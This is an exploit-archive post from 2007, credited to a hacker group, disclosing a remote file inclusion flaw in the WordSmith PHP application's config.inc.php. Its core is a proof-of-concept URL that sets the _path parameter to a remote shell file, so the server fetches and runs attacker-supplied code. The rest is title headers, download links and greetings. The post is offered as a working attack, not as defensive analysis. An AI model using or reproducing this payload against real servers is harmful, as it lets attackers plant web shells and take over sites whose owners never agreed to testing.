[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wordsmith 1.1b (config.inc.php _path) Remote File Inclusion Vuln
# Published : 2007-09-23
# Author : ShockShadow
# Previous Title : sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability
# Next Title : PHP-Nuke addon Nuke Mobile Entartainment LFI Vulnerability


--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+            WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion            +==--
--==+================================================================================+==--

Software:     WordSmith 1.0 RC1
SF page:      http://sourceforge.net/news/?group_id=90418
exploit:      Remote File Inclusion [High Risk]
By:           ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://skrypty.webpc.pl/pobierz13.html

##############################

==============
Dork: built in ;)

PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################

by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS 

# www.Syue.com [2007-09-23]